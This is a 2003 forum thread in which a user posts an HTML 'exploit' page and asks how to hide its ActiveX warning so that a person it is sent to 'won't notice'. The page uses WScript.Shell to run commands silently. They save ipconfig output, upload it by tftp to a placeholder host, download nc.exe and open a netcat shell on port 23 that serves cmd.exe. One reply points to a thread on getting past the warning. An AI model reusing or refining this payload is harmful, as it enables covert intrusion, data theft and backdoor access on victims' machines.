ATB
Aug 29 2003, 12:57 PM
i did a web page exploite
but when im opening the page i get ActiveX Msg
im looking for Java Script Code or something else that Disable the ActiveX msg
some1 Know something about that ??
10x alot !
ComSec
Aug 29 2003, 02:30 PM
take a look at this thread...they overcame the problem of the ActiveX display message...perhaps you might be able to combine your exploit with some off the code idea's published in the thread
http://forums.governmentsecurity.org/index...?showtopic=1694good luck
ATB
Aug 29 2003, 05:07 PM
10x but i didnt seccuded to combain something :\ here is my
html code for the exploite
| QUOTE |
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("CMD /c ipconfig>>ip.txt" , intWindowStyle="0")
wsh.Run("CMD /c tftp -i URIPHERE put ip.txt" , intWindowStyle="0" , bWaitOnReturn="TRUE")
wsh.Run("CMD /c tftp -i URIPHERE GET nc.exe" , intWindowStyle="0" , bWaitOnReturn="TRUE")
wsh.Run("CMD /c nc.exe -l -p 23 -t -e cmd.exe" , intWindowStyle="0")
</script>
</html>
|
if some 1 can do something with that do disable the activeX msg ill be very happy...
silos
Aug 29 2003, 06:16 PM
I don't know if this is what you want, but the free browser called 'SLIMBROWSER' has the option to disable ActiveX so it might do the job.
ATB
Aug 29 2003, 06:47 PM
no m8...im not looking for a browser that disable ActiveX im just looking for code or something to add to this HTML file that disable the ActiveX msg
for example :
if im sending this file to some1 he wont notice that ActiveX is on the Html File
there is such code to add or something else to do ?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
